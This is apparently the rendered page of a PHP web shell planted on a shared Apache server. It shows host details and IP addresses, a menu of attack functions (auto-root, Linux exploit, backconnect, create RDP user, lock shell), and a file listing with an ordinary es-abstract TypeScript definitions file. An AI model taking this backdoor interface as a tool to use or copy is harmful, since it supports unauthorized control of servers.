Linux iad1-shared-b7-18 6.6.49-grsec-jammy+ #10 SMP Thu Sep 12 23:23:08 UTC 2024 x86_64
Apache
: 67.205.6.31 | : 216.73.216.47
Cant Read [ /etc/named.conf ]
8.2.29
fernandoquevedo
Terminal
AUTO ROOT
Adminer
Backdoor Destroyer
Linux Exploit
Lock Shell
Lock File
Create User
CREATE RDP
PHP Mailer
BACKCONNECT
UNLOCK SHELL
HASH IDENTIFIER
README
+ Create Folder
+ Create File
/
usr /
share /
nodejs /
@types /
es-abstract /
[ HOME SHELL ]
Name
Size
Permission
Action
2015
[ DIR ]
drwxr-xr-x
2016
[ DIR ]
drwxr-xr-x
2017
[ DIR ]
drwxr-xr-x
2018
[ DIR ]
drwxr-xr-x
2019
[ DIR ]
drwxr-xr-x
5
[ DIR ]
drwxr-xr-x
helpers
[ DIR ]
drwxr-xr-x
operations
[ DIR ]
drwxr-xr-x
GetIntrinsic.d.ts
73.32
KB
-rwxr-xr-x
es2015.d.ts
7.7
KB
-rwxr-xr-x
es2016.d.ts
8
KB
-rwxr-xr-x
es2017.d.ts
8.05
KB
-rwxr-xr-x
es2018.d.ts
8.45
KB
-rwxr-xr-x
es2019.d.ts
8.66
KB
-rwxr-xr-x
es5.d.ts
3.1
KB
-rwxr-xr-x
es6.d.ts
67
B
-rwxr-xr-x
es7.d.ts
67
B
-rwxr-xr-x
index.d.ts
1.55
KB
-rwxr-xr-x
package.json
988
B
-rwxr-xr-x
Delete
Unzip
Zip
${this.title}
Close
Code Editor : index.d.ts
// Type definitions for es-abstract 1.17 // Project: https://github.com/ljharb/es-abstract // Definitions by: Jordan Harband <https://github.com/ljharb> // ExE Boss <https://github.com/ExE-Boss> // Definitions: https://github.com/DefinitelyTyped/DefinitelyTyped // TypeScript Version: 3.8 import ES5 = require('./es5'); import ES6 = require('./es6'); import ES7 = require('./es7'); import ES2015 = require('./es2015'); import ES2016 = require('./es2016'); import ES2017 = require('./es2017'); import ES2018 = require('./es2018'); import ES2019 = require('./es2019'); declare namespace ESAbstract { // ES2015 types: type PropertyKey = string | symbol; // ES5 types: interface GenericDescriptor { '[[Configurable]]'?: boolean | undefined; '[[Enumerable]]'?: boolean | undefined; } interface AccessorDescriptor<T = unknown> extends GenericDescriptor { '[[Get]]'?(): T; '[[Set]]'?(value: T): void; } interface DataDescriptor<T = unknown> extends GenericDescriptor { '[[Writable]]'?: boolean | undefined; '[[Value]]'?: T | undefined; } type PropertyDescriptor<T = unknown> = AccessorDescriptor<T> | DataDescriptor<T>; } interface ESAbstract extends ES6 { readonly ES5: ES5; /** @deprecated */ readonly ES6: ES6; /** @deprecated */ readonly ES7: ES7; readonly ES2015: ES2015; readonly ES2016: ES2016; readonly ES2017: ES2017; readonly ES2018: ES2018; readonly ES2019: ES2019; } declare const ESAbstract: ESAbstract; export = ESAbstract;
Close